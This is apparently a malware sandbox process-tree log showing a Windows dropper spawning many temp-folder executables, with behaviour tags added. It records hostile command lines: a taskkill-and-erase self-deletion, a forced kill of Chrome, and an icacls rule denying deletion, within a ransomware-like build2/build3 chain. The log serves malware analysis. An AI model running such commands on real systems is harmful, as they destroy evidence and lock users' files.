C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue1109eec571ac.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue1109eec571ac.exe" & exit6⤵PID:2196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue1109eec571ac.exe" /f7⤵
- Kills process with taskkill
PID:2296
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe4⤵
- Loads dropped DLL
PID:760 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11bc0507b56295.exeTue11bc0507b56295.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe4⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeTue11e4e580f2e8141a3.exe5⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3212
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3360
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3752
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3984
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3188
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3748
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:4012
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:4040
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:4056
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:1200
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:4088
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11e4e580f2e8141a3.exe6⤵PID:3904
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe4⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue11141271fbe5877f.exeTue11141271fbe5877f.exe5⤵
- Executes dropped EXE
PID:1172 -
C:\ProgramData\8353220.exe"C:\ProgramData\8353220.exe"6⤵PID:2220
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2220 -s 17327⤵
- Program crash
PID:1112
-
-
-
C:\ProgramData\4849544.exe"C:\ProgramData\4849544.exe"6⤵PID:2252
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:3024
-
-
-
C:\ProgramData\5885772.exe"C:\ProgramData\5885772.exe"6⤵PID:2420
-
-
C:\ProgramData\6582302.exe"C:\ProgramData\6582302.exe"6⤵PID:2540
-
-
C:\ProgramData\8755874.exe"C:\ProgramData\8755874.exe"6⤵PID:2584
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue118f55232e4.exe4⤵
- Loads dropped DLL
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue118f55232e4.exeTue118f55232e4.exe5⤵
- Executes dropped EXE
PID:436 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2408
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe4⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\7zS0E6D8C14\Tue112c483dd3245d.exeTue112c483dd3245d.exe5⤵PID:2732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 9846⤵
- Program crash
PID:3016
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2124 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2136
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1128 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\623C.exeC:\Users\Admin\AppData\Local\Temp\623C.exe1⤵PID:3080
-
C:\Windows\system32\taskeng.exetaskeng.exe {87979184-01C0-42AE-A52C-31C1D32FB08C} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:3856
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\A890.exeC:\Users\Admin\AppData\Local\Temp\A890.exe1⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\A890.exeC:\Users\Admin\AppData\Local\Temp\A890.exe2⤵PID:1108
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\9fd8bb59-c1e7-4c7d-9d44-37c10fd6a919" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3240
-
-
C:\Users\Admin\AppData\Local\Temp\A890.exe"C:\Users\Admin\AppData\Local\Temp\A890.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:4016
-
C:\Users\Admin\AppData\Local\Temp\A890.exe"C:\Users\Admin\AppData\Local\Temp\A890.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:3356
-
C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build2.exe"C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build2.exe"5⤵PID:4260
-
C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build2.exe"C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build2.exe"6⤵PID:4424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4260 -s 1126⤵
- Program crash
PID:4796
-
-
-
C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build3.exe"C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build3.exe"5⤵PID:4404
-
C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build3.exe"C:\Users\Admin\AppData\Local\5eececb5-61e4-4a4b-a832-443d1bce180e\build3.exe"6⤵PID:4888
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D673.exeC:\Users\Admin\AppData\Local\Temp\D673.exe1⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\1B9.exeC:\Users\Admin\AppData\Local\Temp\1B9.exe1⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\47ED.exeC:\Users\Admin\AppData\Local\Temp\47ED.exe1⤵PID:3676